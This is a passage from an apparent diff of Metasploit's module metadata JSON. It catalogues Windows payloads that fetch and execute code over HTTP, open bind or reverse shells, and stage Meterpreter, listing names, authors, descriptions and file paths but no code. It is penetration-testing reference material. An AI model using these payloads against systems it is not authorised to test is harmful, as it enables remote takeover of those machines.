"Windows Command, Generic Command Execution", + "fullname": "payload/cmd/windows/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "juan vazquez " + ], + "description": "Executes the supplied command", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/generic.rb", + "is_install_path": true, + "ref_name": "cmd/windows/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/http/x64/custom/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + 
"payload_cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/custom/bind_named_pipe": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 
14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/http/x64/custom/bind_tcp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/custom/bind_tcp_rc4": { + "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + 
"disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/custom/bind_tcp_uuid": { + "name": "HTTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/http/x64/custom/reverse_http": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/http/x64/custom/reverse_https": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode 
stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_https", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/http/x64/custom/reverse_named_pipe": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_named_pipe", + "staged": true, + "stage_refname": 
"windows/x64/custom", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/http/x64/custom/reverse_tcp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/http/x64/custom/reverse_tcp_rc4": { + "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + 
"targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/http/x64/custom/reverse_tcp_uuid": { + "name": "HTTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/http/x64/custom/reverse_winhttp": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 
Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/custom/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/http/x64/custom/reverse_winhttps": { + "name": "HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/http/x64/custom/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": 
"cmd/windows/http/x64/custom/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/custom/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/http/x64/encrypted_shell/reverse_tcp": { + "name": "HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", + "fullname": "payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/encrypted_shell", + "stager_refname": "windows/x64/encrypted_reverse_tcp" + }, + "payload_cmd/windows/http/x64/encrypted_shell_reverse_tcp": { + "name": "HTTP Fetch, Windows Encrypted Reverse Shell", + "fullname": "payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan 
Watters", + "Matt Graeber", + "Shelby Pace" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn an encrypted command shell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/http/x64/exec": { + "name": "HTTP Fetch, Windows x64 Execute Command", + "fullname": "payload/cmd/windows/http/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nExecute an arbitrary command (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/exec", + "staged": false + }, + "payload_cmd/windows/http/x64/loadlibrary": { + "name": "HTTP Fetch, Windows x64 LoadLibrary Path", + "fullname": "payload/cmd/windows/http/x64/loadlibrary", + "aliases": 
[], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "scriptjunkie", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nLoad an arbitrary x64 library path", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/loadlibrary", + "staged": false + }, + "payload_cmd/windows/http/x64/messagebox": { + "name": "HTTP Fetch, Windows MessageBox x64", + "fullname": "payload/cmd/windows/http/x64/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "pasta " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/messagebox", + "staged": false + }, + "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp": { + "name": "HTTP Fetch, Windows x64 
IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 
null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_named_pipe": { + "name": "HTTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_named_pipe" + }, + 
"payload_cmd/windows/http/x64/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_tcp_rc4": { + "name": "HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 
null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/http/x64/meterpreter/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/http/x64/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/http/x64", + "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": 
